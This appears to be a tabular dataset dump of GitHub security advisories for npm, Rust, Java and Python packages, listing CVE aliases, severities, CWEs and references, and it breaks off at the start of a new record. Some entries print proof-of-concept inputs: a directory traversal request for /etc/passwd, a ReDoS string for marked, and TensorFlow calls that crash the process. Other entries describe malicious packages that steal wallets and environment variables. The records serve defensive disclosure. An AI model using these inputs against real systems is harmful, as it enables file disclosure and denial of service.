ecosystem
stringclasses
14 values
vuln_id
stringlengths
10
19
summary
stringlengths
4
267
details
stringlengths
9
13.5k
aliases
stringlengths
17
144
modified_date
stringdate
2010-05-27 05:47:00
2022-05-10 08:46:52
published_date
stringdate
2005-12-31 05:00:00
2022-05-10 08:46:50
severity
stringclasses
5 values
score
float64
0
10
cwe_id
stringclasses
988 values
refs
stringlengths
30
17.7k
introduced
stringlengths
75
4.26k
GHSA
GHSA-8fr3-hfg3-gpgp
Open Redirect in node-forge
parseUrl functionality in node-forge mishandles certain uses of backslash such as https:/\/\/\ and interprets the URI as a relative path.
{'CVE-2022-0122'}
2022-01-21T23:36:19Z
2022-01-21T23:36:19Z
MODERATE
0
{'CWE-601'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-0122', 'https://huntr.dev/bounties/41852c50-3c6d-4703-8c55-4db27164a4ae', 'https://github.com/digitalbazaar/forge/commit/db8016c805371e72b06d8e2edfe0ace0df934a5e', 'https://github.com/advisories/GHSA-8fr3-hfg3-gpgp'}
null
GHSA
GHSA-w5r2-gvgf-mpm8
Improper Encoding or Escaping of Output and Injection in LibreNMS
An issue was discovered in LibreNMS 1.50.1. The scripts that handle graphing options (includes/html/graphs/common.inc.php and includes/html/graphs/graphs.inc.php) do not sufficiently validate or encode several fields of user supplied input. Some parameters are filtered with mysqli_real_escape_string, which is only useful for preventing SQL injection attacks; other parameters are unfiltered. This allows an attacker to inject RRDtool syntax with newline characters via the html/graph.php and html/graph-realtime.php scripts. RRDtool syntax is quite versatile and an attacker could leverage this to perform a number of attacks, including disclosing directory structure and filenames, disclosing file content, denial of service, or writing arbitrary files. NOTE, relative to CVE-2019-10665, this requires authentication and the pathnames differ.
{'CVE-2019-12463'}
2021-05-11T14:41:55Z
2019-10-11T18:43:13Z
HIGH
8.8
{'CWE-116', 'CWE-74'}
{'https://github.com/advisories/GHSA-w5r2-gvgf-mpm8', 'https://www.darkmatter.ae/xen1thlabs/librenms-rrdtool-injection-vulnerability-xl-19-022/', 'https://nvd.nist.gov/vuln/detail/CVE-2019-12463'}
null
GHSA
GHSA-mgff-xpg3-3gwc
Malicious Package in bsae-x
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-10-01T20:57:02Z
2020-09-03T19:42:25Z
CRITICAL
9.1
{'CWE-506'}
{'https://www.npmjs.com/advisories/1380', 'https://github.com/advisories/GHSA-mgff-xpg3-3gwc'}
null
GHSA
GHSA-r683-j2x4-v87g
node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor
node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor
{'CVE-2022-0235'}
2022-04-19T19:03:26Z
2022-01-21T23:55:52Z
HIGH
8.8
{'CWE-200', 'CWE-173', 'CWE-601'}
{'https://github.com/node-fetch/node-fetch/commit/36e47e8a6406185921e4985dcbeff140d73eaa10', 'https://github.com/node-fetch/node-fetch/pull/1453', 'https://huntr.dev/bounties/d26ab655-38d6-48b3-be15-f9ad6b6ae6f7', 'https://github.com/advisories/GHSA-r683-j2x4-v87g', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0235', 'https://github.com/node-fetch/node-fetch/commit/5c32f002fdd65b1c6a8f1e3620210813d45c7e60'}
null
GHSA
GHSA-2jhh-5xm2-j4gf
Improper Authentication in HashiCorp Nomad
HashiCorp Nomad and Nomad Enterprise up to 1.0.13, 1.1.7, and 1.2.0, with the QEMU task driver enabled, allowed authenticated users with job submission capabilities to bypass the configured allowed image paths. Fixed in 1.0.14, 1.1.8, and 1.2.1.
{'CVE-2021-43415'}
2021-12-10T20:17:55Z
2021-12-10T20:17:55Z
HIGH
8.8
{'CWE-287'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-43415', 'https://www.hashicorp.com/blog/category/nomad', 'https://discuss.hashicorp.com/t/hcsec-2021-31-nomad-qemu-task-driver-allowed-paths-bypass-with-job-args/32288', 'https://github.com/advisories/GHSA-2jhh-5xm2-j4gf'}
null
GHSA
GHSA-32j9-6qqm-mq9g
Unhandled case in node-lmdb
The package node-lmdb before 0.9.7 is vulnerable to Denial of Service (DoS) when defining a non-invokable `ToString` value, which will cause a crash during type check.
{'CVE-2022-21164'}
2022-03-30T20:16:16Z
2022-03-17T00:00:27Z
HIGH
7.5
{'CWE-241', 'CWE-703'}
{'https://snyk.io/vuln/SNYK-JS-NODELMDB-2400723', 'https://github.com/Venemo/node-lmdb/commit/97760104c0fd311206b88aecd91fa1f59fe2b85a', 'https://github.com/advisories/GHSA-32j9-6qqm-mq9g', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21164'}
null
GHSA
GHSA-x5m6-jh4r-34mv
Arbitrary File Overwrite in hub
The am function in lib/hub/commands.rb in hub before 1.12.1 allows local users to overwrite arbitrary files via a symlink attack on a temporary patch file.
{'CVE-2014-0177'}
2022-02-15T01:07:53Z
2022-02-15T01:07:53Z
MODERATE
4.4
{'CWE-377'}
{'https://secunia.com/advisories/58273', 'https://github.com/github/hub/commit/016ec99d25b1cb83cb4367e541177aa431beb600', 'https://nvd.nist.gov/vuln/detail/CVE-2014-0177', 'https://github.com/advisories/GHSA-x5m6-jh4r-34mv'}
null
GHSA
GHSA-j7cg-h9v9-6vqp
"Prototype Pollution in irrelon-path and @irrelon/path"
The package irrelon-path before 4.7.0; the package @irrelon/path before 4.7.0 are vulnerable to Prototype Pollution via the set, unSet, pushVal and pullVal functions.
{'CVE-2020-7708'}
2021-07-29T21:55:56Z
2021-05-06T17:29:19Z
CRITICAL
9.8
{'CWE-915'}
{'https://github.com/advisories/GHSA-j7cg-h9v9-6vqp', 'https://snyk.io/vuln/SNYK-JS-IRRELONPATH-598672', 'https://github.com/Irrelon/irrelon-path/commit/8a126b160c1a854ae511659c111413ad9910ebe3', 'https://snyk.io/vuln/SNYK-JS-IRRELONPATH-598673', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7708'}
null
GHSA
GHSA-6v6p-p97v-g2p7
Out-of-bounds Write in OpenCV
OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python and OpenCV-Contrib-Python 3.3.0.9) has an invalid write in the cv::RLByteStream::getBytes function in modules/imgcodecs/src/bitstrm.cpp when reading an image file by using cv::imread, as demonstrated by the 2-opencv-heapoverflow-fseek test case.
{'CVE-2017-12603'}
2021-11-18T15:32:37Z
2021-10-12T22:01:44Z
HIGH
8.8
{'CWE-787'}
{'https://github.com/advisories/GHSA-6v6p-p97v-g2p7', 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12603', 'https://github.com/opencv/opencv/pull/9376', 'https://security.gentoo.org/glsa/201712-02', 'https://github.com/opencv/opencv/issues/9309', 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html', 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}
null
GHSA
GHSA-gxcm-36qw-j29v
SQL Injection in tribalsystems/zenario
SQL Injection in the "admin_boxes.ajax.php" component of Tribal Systems Zenario CMS v8.8.52729 allows remote attackers to obtain sesnitive database information by injecting SQL commands into the "cID" parameter when creating a new HTML component.
{'CVE-2021-27672'}
2021-06-08T20:12:02Z
2021-06-08T20:12:02Z
MODERATE
4.9
{'CWE-89'}
{'https://deadsh0t.medium.com/blind-error-based-authenticated-sql-injection-on-zenario-8-8-52729-cms-d4705534df38', 'https://github.com/TribalSystems/Zenario/commit/2c82a4d126c8446106347ef603b157f2d4175fd1', 'https://github.com/advisories/GHSA-gxcm-36qw-j29v', 'https://nvd.nist.gov/vuln/detail/CVE-2021-27672', 'https://github.com/TribalSystems/Zenario/releases/tag/8.8.53370'}
null
GHSA
GHSA-7rg2-qxmf-hhx9
Session fixation in express-openid-connect
### Overview Versions `2.3.0` up to and including `2.5.1` do not regenerate the session id and session cookie when user logs in. This behavior opens up the application to various session fixation vulnerabilities. ### Am I affected? You are affected by this vulnerability if you are using `express-openid-connect` version `2.3.0` up to and including `2.5.1` and use a custom session store. ### How to fix that? Upgrade to version `>= 2.5.2`. ### Will this update impact my users? The fix provided in patch will not affect your users.
{'CVE-2021-41246'}
2021-12-15T15:28:49Z
2021-12-09T19:08:58Z
MODERATE
4.6
{'CWE-384'}
{'https://github.com/auth0/express-openid-connect/releases/tag/v2.5.2', 'https://github.com/auth0/express-openid-connect/security/advisories/GHSA-7rg2-qxmf-hhx9', 'https://github.com/advisories/GHSA-7rg2-qxmf-hhx9', 'https://github.com/auth0/express-openid-connect/commit/5ab67ff2bd84f76674066b5e129b43ab5f2f430f', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41246'}
null
GHSA
GHSA-xrqm-fpgr-6hhx
Overflow/crash in `tf.range`
### Impact While calculating the size of the output within the `tf.range` kernel, there is a conditional statement of type `int64 = condition ? int64 : double`. Due to C++ implicit conversion rules, both branches of the condition will be cast to `double` and the result would be truncated before the assignment. This result in overflows: ```python import tensorflow as tf tf.sparse.eye(num_rows=9223372036854775807, num_columns=None) ``` Similarly, `tf.range` would result in crashes due to overflows if the start or end point are too large. ```python import tensorflow as tf tf.range(start=-1e+38, limit=1) ``` ### Patches We have patched the issue in GitHub commits [6d94002a09711d297dbba90390d5482b76113899](https://github.com/tensorflow/tensorflow/commit/6d94002a09711d297dbba90390d5482b76113899) (merging [#51359](https://github.com/tensorflow/tensorflow/pull/51359)) and [1b0e0ec27e7895b9985076eab32445026ae5ca94](https://github.com/tensorflow/tensorflow/commit/1b0e0ec27e7895b9985076eab32445026ae5ca94) (merging [#51711](https://github.com/tensorflow/tensorflow/pull/51711)). The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported externally via [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46912), [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46899) and [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46889).
{'CVE-2021-41202'}
2021-11-10T19:13:16Z
2021-11-10T19:13:16Z
MODERATE
5.5
{'CWE-681'}
{'https://github.com/tensorflow/tensorflow/issues/46889', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41202', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xrqm-fpgr-6hhx', 'https://github.com/tensorflow/tensorflow/commit/1b0e0ec27e7895b9985076eab32445026ae5ca94', 'https://github.com/tensorflow/tensorflow/issues/46912', 'https://github.com/tensorflow/tensorflow/commit/6d94002a09711d297dbba90390d5482b76113899', 'https://github.com/advisories/GHSA-xrqm-fpgr-6hhx'}
null
GHSA
GHSA-5v2h-r2cx-5xgj
Inefficient Regular Expression Complexity in marked
### Impact _What kind of vulnerability is it?_ Denial of service. The regular expression `inline.reflinkSearch` may cause catastrophic backtracking against some strings. PoC is the following. ```javascript import * as marked from 'marked'; console.log(marked.parse(`[x]: x \\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](`)); ``` _Who is impacted?_ Anyone who runs untrusted markdown through marked and does not use a worker with a time limit. ### Patches _Has the problem been patched?_ Yes _What versions should users upgrade to?_ 4.0.10 ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ Do not run untrusted markdown through marked or run marked on a [worker](https://marked.js.org/using_advanced#workers) thread and set a reasonable time limit to prevent draining resources. ### References _Are there any links users can visit to find out more?_ - https://marked.js.org/using_advanced#workers - https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS ### For more information If you have any questions or comments about this advisory: * Open an issue in [marked](https://github.com/markedjs/marked)
{'CVE-2022-21681'}
2022-04-19T19:03:20Z
2022-01-14T21:04:46Z
HIGH
7.5
{'CWE-1333'}
{'https://github.com/markedjs/marked/security/advisories/GHSA-5v2h-r2cx-5xgj', 'https://github.com/advisories/GHSA-5v2h-r2cx-5xgj', 'https://github.com/markedjs/marked/commit/8f806573a3f6c6b7a39b8cdb66ab5ebb8d55a5f5', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21681'}
null
GHSA
GHSA-3wxq-7r8m-qpmg
Hijacked Environment Variables in ffmepg
The `ffmepg` package is a piece of malware that steals environment variables and sends them to attacker controlled locations. All versions have been unpublished from the npm registry. ## Recommendation As this package is malware, if you find it installed in your environment, the real security concern is determining how it got there. If you have found this installed in your environment, you should: 1. Delete the package 2. Clear your npm cache 3. Ensure it is not present in any other package.json files on your system 4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables. Additionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.
{'CVE-2017-16068'}
2021-01-08T19:58:20Z
2018-08-29T23:56:30Z
MODERATE
0
{'CWE-506'}
{'https://www.npmjs.com/advisories/507', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16068', 'https://nodesecurity.io/advisories/507', 'https://github.com/advisories/GHSA-3wxq-7r8m-qpmg'}
null
GHSA
GHSA-c7hr-j4mj-j2w6
Verification Bypass in jsonwebtoken
Versions 4.2.1 and earlier of `jsonwebtoken` are affected by a verification bypass vulnerability. This is a result of weak validation of the JWT algorithm type, occuring when an attacker is allowed to arbitrarily specify the JWT algorithm. ## Recommendation Update to version 4.2.2 or later.
{'CVE-2015-9235'}
2021-01-08T19:00:39Z
2018-10-09T00:38:30Z
CRITICAL
0
{'CWE-20'}
{'https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/', 'https://www.timmclean.net/2015/02/25/jwt-alg-none.html', 'https://nvd.nist.gov/vuln/detail/CVE-2015-9235', 'https://github.com/advisories/GHSA-c7hr-j4mj-j2w6', 'https://www.npmjs.com/advisories/17', 'https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687', 'https://nodesecurity.io/advisories/17'}
null
GHSA
GHSA-f5mh-hq6h-whxv
Directory Traversal in bitty
Affected versions of `bitty` are vulnerable to directory traversal via the URL path in GET requests. ## Recommendation The `bitty` package is not currently maintained, and has not seen an update since 2015. At this time, the best available mitigation is to use an alternative module that is actively maintained and provides similar functionality, such as [serve](https://www.npmjs.com/package/serve).
{'CVE-2016-10561'}
2021-01-08T21:04:47Z
2019-02-18T23:38:29Z
MODERATE
0
{'CWE-22'}
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10561', 'https://nodesecurity.io/advisories/150', 'https://github.com/advisories/GHSA-f5mh-hq6h-whxv', 'https://www.npmjs.com/advisories/150'}
null
GHSA
GHSA-92cx-4xm7-jr9m
Use After Free in rusqlite
An issue was discovered in the rusqlite crate 0.25.x before 0.25.4 and 0.26.x before 0.26.2 for Rust. create_scalar_function has a use-after-free.
{'CVE-2021-45713'}
2022-01-07T16:09:59Z
2022-01-06T22:02:56Z
HIGH
7.5
{'CWE-416'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-45713', 'https://github.com/advisories/GHSA-92cx-4xm7-jr9m', 'https://rustsec.org/advisories/RUSTSEC-2021-0128.html', 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/rusqlite/RUSTSEC-2021-0128.md'}
null
GHSA
GHSA-h9rv-jmmf-4pgx
Cross-Site Scripting in serialize-javascript
Versions of `serialize-javascript` prior to 2.1.1 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize serialized regular expressions. This vulnerability does not affect Node.js applications. ## Recommendation Upgrade to version 2.1.1 or later.
{'CVE-2019-16769'}
2021-01-08T18:42:23Z
2019-12-05T18:44:37Z
MODERATE
4.2
{'CWE-79'}
{'https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-h9rv-jmmf-4pgx', 'https://www.npmjs.com/advisories/1426', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16769', 'https://github.com/advisories/GHSA-h9rv-jmmf-4pgx'}
null
GHSA
GHSA-39xg-8p43-h76x
Data races in reffers
An issue was discovered in the reffers crate through 2020-12-01 for Rust. ARefss can contain a !Send,!Sync object, leading to a data race and memory corruption.
{'CVE-2020-36203'}
2021-08-25T20:51:40Z
2021-08-25T20:51:40Z
MODERATE
4.7
{'CWE-362', 'CWE-787'}
{'https://rustsec.org/advisories/RUSTSEC-2020-0094.html', 'https://github.com/diwic/reffers-rs/issues/7', 'https://github.com/advisories/GHSA-39xg-8p43-h76x', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36203'}
null
GHSA
GHSA-f8fh-8rgm-227h
OS Command Injection in node-prompt-here
node-prompt-here through 1.0.1 allows execution of arbitrary commands. The "runCommand()" is called by "getDevices()" function in file "linux/manager.js", which is required by the "index. process.env.NM_CLI" in the file "linux/manager.js". This function is used to construct the argument of function "execSync()", which can be controlled by users without any sanitization.
{'CVE-2020-7602'}
2021-07-28T20:46:04Z
2021-05-07T16:16:16Z
CRITICAL
9.8
{'CWE-78'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-7602', 'https://github.com/advisories/GHSA-f8fh-8rgm-227h', 'https://snyk.io/vuln/SNYK-JS-NODEPROMPTHERE-560115'}
null
GHSA
GHSA-2mh8-gx2m-mr75
Out-of-Memory Error in Bouncy Castle Crypto
The ASN.1 parser in Bouncy Castle Crypto (aka BC Java) 1.63 can trigger a large attempted memory allocation, and resultant OutOfMemoryError error, via crafted ASN.1 data. This is fixed in 1.64.
{'CVE-2019-17359'}
2021-01-22T17:43:10Z
2019-10-17T18:15:16Z
MODERATE
0
{'CWE-770'}
{'https://lists.apache.org/thread.html/r02f887807a49cfd1f1ad53f7a61f3f8e12f60ba2c930bec163031209@%3Ccommits.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/r8ecb5b76347f84b6e3c693f980dbbead88c25f77b815053c4e6f2c30@%3Ccommits.tomee.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://lists.apache.org/thread.html/r467ade3fef3493f1fff1a68a256d087874e1f858ad1de7a49fe05d27@%3Ccommits.tomee.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://www.bouncycastle.org/releasenotes.html', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://www.bouncycastle.org/latest_releases.html', 'https://lists.apache.org/thread.html/r79b6a6aa0dd1aeb57bd253d94794bc96f1ec005953c4bd5414cc0db0@%3Ccommits.tomee.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://github.com/advisories/GHSA-2mh8-gx2m-mr75', 'https://nvd.nist.gov/vuln/detail/CVE-2019-17359', 'https://lists.apache.org/thread.html/r91b07985b1307390a58c5b9707f0b28ef8e9c9e1c86670459f20d601@%3Ccommits.tomee.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20191024-0006/', 'https://www.oracle.com/security-alerts/cpujan2020.html', 'https://lists.apache.org/thread.html/r16c3a90cb35ae8a9c74fd5c813c16d6ac255709c9f9d71cd409e007d@%3Ccommits.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/r4d475dcaf4f57115fa57d8e06c3823ca398b35468429e7946ebaefdc@%3Ccommits.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/re60f980c092ada4bfe236dcfef8b6ca3e8f3b150fc0f51b8cc13d59d@%3Ccommits.tomee.apache.org%3E'}
null
GHSA
GHSA-xjqr-g762-pxwp
Improper limitation of path name
An improper limitation of path name flaw was found in containernetworking/cni in versions before 0.8.1. When specifying the plugin to load in the 'type' field in the network configuration, it is possible to use special elements such as "../" separators to reference binaries elsewhere on the system. This flaw allows an attacker to execute other existing binaries other than the cni plugins/types, such as 'reboot'. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
{'CVE-2021-20206'}
2022-04-12T22:49:04Z
2022-02-15T01:57:18Z
HIGH
7.2
{'CWE-20', 'CWE-22'}
{'https://github.com/containernetworking/cni/pull/808', 'https://nvd.nist.gov/vuln/detail/CVE-2021-20206', 'https://github.com/advisories/GHSA-xjqr-g762-pxwp', 'https://bugzilla.redhat.com/show_bug.cgi?id=1919391', 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMCONTAINERNETWORKINGCNIPKGINVOKE-1070549'}
null
GHSA
GHSA-836g-5fr5-fgcr
Missing Authentication for Critical Function in Apache TomEE
If Apache TomEE is configured to use the embedded ActiveMQ broker, and the broker URI includes the useJMX=true parameter, a JMX port is opened on TCP port 1099, which does not include authentication. This affects Apache TomEE 8.0.0-M1 - 8.0.1, Apache TomEE 7.1.0 - 7.1.2, Apache TomEE 7.0.0-M1 - 7.0.7, Apache TomEE 1.0.0 - 1.7.5.
{'CVE-2020-11969'}
2022-02-10T23:07:37Z
2022-02-10T23:07:37Z
HIGH
9.8
{'CWE-306'}
{'https://lists.apache.org/thread.html/ref088c4732e1a8dd0bbbb96e13ffafcfe65f984238ffa55f438d78fe@%3Cdev.tomee.apache.org%3E', 'http://www.openwall.com/lists/oss-security/2020/12/16/2', 'https://lists.apache.org/thread.html/rbd23418646dedda70a546331ea1c1d115b8975b7e7dc452d10e2e773@%3Cannounce.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-11969', 'https://lists.apache.org/thread.html/ref088c4732e1a8dd0bbbb96e13ffafcfe65f984238ffa55f438d78fe@%3Cusers.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/r85b87478f8aa4751aa3a06e88622e80ffabae376ee7283e147ee56b9@%3Cdev.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/rbd23418646dedda70a546331ea1c1d115b8975b7e7dc452d10e2e773%40%3Cdev.tomee.apache.org%3E', 'https://github.com/advisories/GHSA-836g-5fr5-fgcr'}
null
GHSA
GHSA-fg3j-q579-v8x4
Uncontrolled memory consumption
In Apache PDFBox, a carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.
{'CVE-2021-31811'}
2022-04-22T15:48:15Z
2021-06-15T15:54:32Z
MODERATE
5.5
{'CWE-789', 'CWE-770'}
{'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://nvd.nist.gov/vuln/detail/CVE-2021-31811', 'https://lists.apache.org/thread.html/r2090789e4dcc2c87aacbd87d5f18e2d64dcb9f6eb7c47f5cf7d293cb@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/re3bd16f0cc8f1fbda46b06a4b8241cd417f71402809baa81548fc20e%40%3Cusers.pdfbox.apache.org%3E', 'https://lists.apache.org/thread.html/rf937c2236e6c79cdb99f76a70690dd345e53dbe0707cb506a202e43e@%3Cannounce.apache.org%3E', 'http://www.openwall.com/lists/oss-security/2021/06/12/2', 'https://lists.apache.org/thread.html/r179cc3b6822c167702ab35fe36093d5da4c99af44238c8a754c6860f@%3Ccommits.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/r143fd8445e0e778f4a85187bd79438630b96b8040e9401751fdb8aea@%3Ccommits.ofbiz.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://lists.apache.org/thread.html/rd4b6db6c3b8ab3c70f1c3bbd725a40920896453ffc2744ade6afd9fb@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/re3bd16f0cc8f1fbda46b06a4b8241cd417f71402809baa81548fc20e@%3Cusers.pdfbox.apache.org%3E', 'https://github.com/advisories/GHSA-fg3j-q579-v8x4', 'https://lists.apache.org/thread.html/r132e9dbbe0ebdc08b39583d8be0a575fdba573d60a42d940228bceff@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MDJKJQOMVFDFIDS27OQJXNOYHV2O273D/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7HHWJRFXZ3PTKLJCOM7WJEYZFKFWMNSV/', 'https://lists.apache.org/thread.html/re0cacd3fb337cdf8469853913ed2b4ddd8f8bfc52ff0ddbe61c1dfba@%3Ccommits.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/rfe26bcaba564deb505c32711ba68df7ec589797dcd96ff3389a8aaba@%3Cnotifications.ofbiz.apache.org%3E', 'https://www.oracle.com//security-alerts/cpujul2021.html'}
null
GHSA
GHSA-24p5-x9f9-vvpx
Cross-site Scripting in baserCMS
Improper neutralization of JavaScript input in the page editing function of baserCMS versions prior to 4.4.5 allows remote authenticated attackers to inject an arbitrary script via unspecified vectors.
{'CVE-2021-20681'}
2021-06-08T20:10:27Z
2021-06-08T20:10:27Z
MODERATE
5.4
{'CWE-79'}
{'https://github.com/baserproject/basercms', 'https://github.com/advisories/GHSA-24p5-x9f9-vvpx', 'https://jvn.jp/en/jp/JVN64869876/index.html', 'https://nvd.nist.gov/vuln/detail/CVE-2021-20681', 'https://basercms.net/security/JVN64869876', 'https://packagist.org/packages/baserproject/basercms'}
null
GHSA
GHSA-xqfm-ff6g-24c7
Directory Traversal in dgard8.lab6
Affected versions of `dgard8.lab6` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system. Example request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:foo ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16218'}
2021-01-08T20:55:55Z
2018-07-23T20:39:44Z
HIGH
0
{'CWE-22'}
{'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/dgard8.lab6', 'https://github.com/advisories/GHSA-xqfm-ff6g-24c7', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16218', 'https://www.npmjs.com/advisories/444', 'https://nodesecurity.io/advisories/444'}
null
GHSA
GHSA-62gx-355r-9fhg
Session operations in eager mode lead to null pointer dereferences
### Impact In eager mode (default in TF 2.0 and later), session operations are invalid. However, users could still call the raw ops associated with them and trigger a null pointer dereference: ```python import tensorflow as tf tf.raw_ops.GetSessionTensor(handle=['\x12\x1a\x07'],dtype=4) ``` ```python import tensorflow as tf tf.raw_ops.DeleteSessionTensor(handle=['\x12\x1a\x07']) ``` The [implementation](https://github.com/tensorflow/tensorflow/blob/eebb96c2830d48597d055d247c0e9aebaea94cd5/tensorflow/core/kernels/session_ops.cc#L104) dereferences the session state pointer without checking if it is valid: ```cc OP_REQUIRES_OK(ctx, ctx->session_state()->GetTensor(name, &val)); ``` Thus, in eager mode, `ctx->session_state()` is nullptr and the call of the member function is undefined behavior. ### Patches We have patched the issue in GitHub commit [ff70c47a396ef1e3cb73c90513da4f5cb71bebba](https://github.com/tensorflow/tensorflow/commit/ff70c47a396ef1e3cb73c90513da4f5cb71bebba). The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
{'CVE-2021-29518'}
2021-05-21T14:21:05Z
2021-05-21T14:21:05Z
LOW
2.5
{'CWE-476'}
{'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-62gx-355r-9fhg', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29518', 'https://github.com/advisories/GHSA-62gx-355r-9fhg', 'https://github.com/tensorflow/tensorflow/commit/ff70c47a396ef1e3cb73c90513da4f5cb71bebba'}
null
GHSA
GHSA-8xxm-h73r-ghfj
Validation bypass in frourio
## 日本語 ### 影響 v0.26.0以前のfrourioを使用している、かつvalidators/を利用している場合、ネストされたバリデータがリクエストのボディーとクエリに対して正しく働かないケースがあります。また、リクエストに対してバリデーションが効かなくなる入力があります。 ### パッチ frourioをv0.26.0かそれ以降のバージョンにアップデートをお願いします。frourio を使用したプロジェクトには `class-transformer` と `reflect-metadata` の依存への追加も必要となります。 ### ワークアラウンド controller側で自分でclass-transformerを使用してチェックする、vaildatorを使わない、など。 ### さらなる情報 このセキュリティ勧告に関する質問やコメントについては、以下の方法でお問い合わせいただけます。 * [frourio](https://github.com/frouriojs/frourio)にIssueを開く。 ## English ### Impact Frourio users who uses frourio version prior to v0.26.0 and integration with class-validator through `validators/` folder. Validators does not work properly for request bodies and queries in specific situations. Addtionally, some kind of input is not validated. (false positives) ### Patches Please update your frourio to v0.26.0 or later. You also need to install `class-transformer` and `reflect-metadata` to your project. ### Workarounds Validate objects from request with class-transformer in controllers by yourself, or prevent using validators. ### For more information If you have any questions or comments about this advisory: * Open an issue in [frourio](https://github.com/frouriojs/frourio)
{'CVE-2022-23623'}
2022-04-19T19:03:22Z
2022-02-07T22:37:45Z
HIGH
8.1
{'CWE-20'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-23623', 'https://github.com/frouriojs/frourio/security/advisories/GHSA-8xxm-h73r-ghfj', 'https://github.com/advisories/GHSA-8xxm-h73r-ghfj', 'https://github.com/frouriojs/frourio/commit/7c19ac5363305b81b1c6b5232620228763d427af'}
null
GHSA
GHSA-5993-wwpg-m92c
